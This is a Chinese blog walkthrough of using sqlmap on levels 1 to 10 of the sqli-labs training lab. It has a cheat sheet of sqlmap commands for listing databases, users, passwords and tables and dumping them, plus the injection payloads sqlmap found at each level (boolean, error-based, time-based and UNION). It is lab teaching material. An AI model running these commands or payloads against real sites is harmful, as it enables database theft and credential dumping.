sqlmap刷sqllibs_01-1-10

最新推荐文章于 2024-08-31 12:44:16 发布

xor0ne_10_01

最新推荐文章于 2024-08-31 12:44:16 发布

阅读量976

点赞数 1

分类专栏： # Sqllibs_master # sqlmap试炼场

本文链接：https://blog.csdn.net/weixin_43901038/article/details/107614040

版权

web安全攻防与靶场练习同时被 3 个专栏收录

44 篇文章 82 订阅

订阅专栏

Sqllibs_master

24 篇文章 9 订阅

订阅专栏

sqlmap试炼场

5 篇文章 0 订阅

订阅专栏

在使用前，我们先大致介绍一下sqlmap可能的用处。
以下来自于：

版权声明：本文为CSDN博主「小明师傅」的原创文章，遵循CC 4.0 BY-SA版权协议，转载请附上原文出处链接及本声明。
原文链接：https://blog.csdn.net/qq_24030907/article/details/106541411

0、清除sqlmap缓存：
第一个办法：在C:\Users\dragoneyes.sqlmap\output，删除output里面的内容
第二个办法：sqlmap.py --purge
1、检测注入点
sqlmap -u 注入点检测注入点是否可用
sqlmap -u 注入点 –batch 自动输入
2、暴库和数据库用户
sqlmap -u 注入点 –dbs //暴库
Web当前使用的数据库
sqlmap -u 注入点 –current-db //爆当前使用的库
- Web数据库使用的账户
  sqlmap -u 注入点 –current-user //当前使用的账户
- 列出sqlserver所有用户
  sqlmap -u 注入点 –users // 列出所有使用过的账户
3、数据库账户与密码
sqlmap -u 注入点 –passwords //mysql的登录账户和密码
4、列出数据库中的表
sqlmap -u 注入点 -D 指定数据库名 –tables //(-D指定数据库名称)
5、列出表中字段
sqlmap -u 注入点 -D 指定数据库名 -T 指定的表名 - -columns
6、爆字段内容
sqlmap -u 注入点 -D 指定数据库名 -T 指定表名 -C “email,username,userpassword” –dump (将结果导出)

–risk：风险等级，共有4个，默认是1会测试大部分的测试语句，2会增加基于事件的测试语句，3会增加OR语句的SQL注入测试。

level：共有五个等级，默认为1，在你不确定哪个payload或者参数为注入点的时候，为了保证全面性，建议使用高的level值。

1、less01-Error Based- String

由于这个比较简单，因此我们可以直接进行最高等级的暴库：

C:\Python27\sqlmap>sqlmap.py -u "http://192.168.1.177:40000/Less-1/?id=1" --level=5 --risk=3 --dbs

在这里插入图片描述
在跑数据库的过程中，我们可以发现，其实sqlmap会将有用的payload输出出来，看见这个，你懂了吗？载荷如下：

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 4225=4225 AND 'gZcP'='gZcP

    Type: error-based
    Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
    Payload: id=1' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7170627171,(SELECT (ELT(5094=5094,1))),0x71626a7171,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'loNl'='loNl

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 1656 FROM (SELECT(SLEEP(5)))rOKe) AND 'cthH'='cthH

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-8083' UNION ALL SELECT NULL,CONCAT(0x7170627171,0x424c456c79416b53754b79614463647857484654456b76454966544364767747446a737173444955,0x71626a7171),NULL-- -
---

接下来是类似于手工注入的常规步骤：

1.1、查看当前数据库

C:\Python27\sqlmap>sqlmap.py -u "http://192.168.1.177:40000/Less-1/?id=1" --current-db

在这里插入图片描述

1.2、枚举出指定数据库中的表名–`mysql -D "security"`和`- - tables`

C:\Python27\sqlmap>sqlmap.py -u "http://192.168.1.177:40000/Less-1/?id=1" --level=5 --risk=3 --dbms=mysql -D "security" --tables

在这里插入图片描述

1.3、枚举出users表中的字段-- `-T "users"`和 `- - col`

C:\Python27\sqlmap>sqlmap.py -u "http://192.168.1.177:40000/Less-1/?id=1" --level=5 --risk=3 --dbms=mysql -D "security" -T "users" --col

在这里插入图片描述

1.4、枚举出指定字段–`-C "password,username"`和`- - dump`

C:\Python27\sqlmap>sqlmap.py -u "http://192.168.1.177:40000/Less-1/?id=1" --level=5 --risk=3 --dbms=mysql -D "security" -T "users" -C "password,username" --dump

如下，数据库尽收眼底。
在这里插入图片描述

2、less02-Error Based- Intiger

和第一关类似，sqlmap给出的sqlmap如下：具体的语句就不一一列举了。

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 6989=6989

    Type: error-based
    Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
    Payload: id=1 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7178626a71,(SELECT (ELT(6000=6000,1))),0x7162706271,0x78))s), 8446744073709551610, 8446744073709551610)))

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1 AND (SELECT 1046 FROM (SELECT(SLEEP(5)))XNPi)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-3218 UNION ALL SELECT NULL,CONCAT(0x7178626a71,0x627549484c74714d6d63704b6c58725270757a6b644678537a7a714b6463415159534877596e796b,0x7162706271),NULL-- -
---

3、less03-Error Based- String (with Twist)

和第一关类似，sqlmap给出的sqlmap如下：具体的语句就不一一列举了。

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1') AND 5965=5965 AND ('Uhxh'='Uhxh

    Type: error-based
    Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
    Payload: id=1') AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x717a6a7a71,(SELECT (ELT(4276=4276,1))),0x7178787671,0x78))s), 8446744073709551610, 8446744073709551610))) AND ('DhTF'='DhTF

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1') AND (SELECT 5032 FROM (SELECT(SLEEP(5)))ZpJN) AND ('qjGP'='qjGP

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-8381') UNION ALL SELECT NULL,NULL,CONCAT(0x717a6a7a71,0x6244626e745745795371456665544570755652784f4c6256444c794f4e6a787a654e474f4b767255,0x7178787671)-- -
---

4、less04-Error Based- DoubleQuotes String

和第一关类似，sqlmap给出的sqlmap如下：具体的语句就不一一列举了。

sqlmap identified the following injection point(s) with a total of 69 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: id=1") AND 3072=3072#

    Type: error-based
    Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
    Payload: id=1") AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x716a6b7071,(SELECT (ELT(5205=5205,1))),0x716b626271,0x78))s), 8446744073709551610, 8446744073709551610))) AND ("yfvD"="yfvD

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1") AND (SELECT 3354 FROM (SELECT(SLEEP(5)))Cwyc) AND ("gvAz"="gvAz

    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: id=-8029") UNION ALL SELECT NULL,CONCAT(0x716a6b7071,0x724d544d6171674c56465a6c4c7247716677484e4851686a4e63676b456e587a464669414c765268,0x716b626271),NULL#
---

5、less05-Double Query- Single Quotes- String

和第一关类似，sqlmap给出的sqlmap如下：具体的语句就不一一列举了。
sqlmap给出的paylaod如下：

sqlmap identified the following injection point(s) with a total of 223 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 7188=7188 AND 'mqLE'='mqLE

    Type: error-based
    Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
    Payload: id=1' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x717a707071,(SELECT (ELT(6541=6541,1))),0x7170707a71,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'aJRC'='aJRC

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 8698 FROM (SELECT(SLEEP(5)))CBFA) AND 'fmva'='fmva
---

6、less06-Double Query- Double Quotes- String

和第一关类似，sqlmap给出的sqlmap如下：具体的语句就不一一列举了。
sqlmap给出的语句如下：

sqlmap identified the following injection point(s) with a total of 221 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: id=1" AND 4582=4582#

    Type: error-based
    Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
    Payload: id=1" AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x716b6b7071,(SELECT (ELT(8039=8039,1))),0x7178767a71,0x78))s), 8446744073709551610, 8446744073709551610)))-- uBIu

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1" AND (SELECT 8198 FROM (SELECT(SLEEP(5)))BnZi)-- XRBu
---

7、less07-Dump into Outfile

和第一关类似，sqlmap给出的sqlmap如下：具体的语句就不一一列举了。
sqlmap给出的语句如下：

sqlmap identified the following injection point(s) with a total of 287 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1') AND 7606=7606 AND ('QcoM'='QcoM

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1') AND (SELECT 3053 FROM (SELECT(SLEEP(5)))oLyk) AND ('rXXO'='rXXO
---

8、less08-Blind- Boolian- Single Quotes- String

和第一关类似，sqlmap给出的sqlmap如下：具体的语句就不一一列举了。
sqlmap给出的语句如下：


sqlmap identified the following injection point(s) with a total of 252 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 7494=7494 AND 'UORd'='UORd

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 9331 FROM (SELECT(SLEEP(5)))MYFE) AND 'sZZC'='sZZC
---

9、less09-Blind- Time based- Single Quotes- String

和第一关类似，sqlmap给出的sqlmap如下：具体的语句就不一一列举了。
sqlmap给出的语句如下：

sqlmap identified the following injection point(s) with a total of 252 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 4639=4639 AND 'PEyr'='PEyr

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 8651 FROM (SELECT(SLEEP(5)))TJGQ) AND 'wKXs'='wKXs
---

10、less10-Blind- Time based- Double Quotes- String

和第一关类似，sqlmap给出的sqlmap如下：具体的语句就不一一列举了。
在查找所有数据库的时候需要列一下等级水平和风险等级，如下：

C:\Python27\sqlmap>sqlmap.py -u "http://192.168.1.177:40000/Less-8/?id=1" --current-db --level=5 --risk=3

sqlmap给出的语句如下：

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 7494=7494 AND 'UORd'='UORd

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 9331 FROM (SELECT(SLEEP(5)))MYFE) AND 'sZZC'='sZZC
---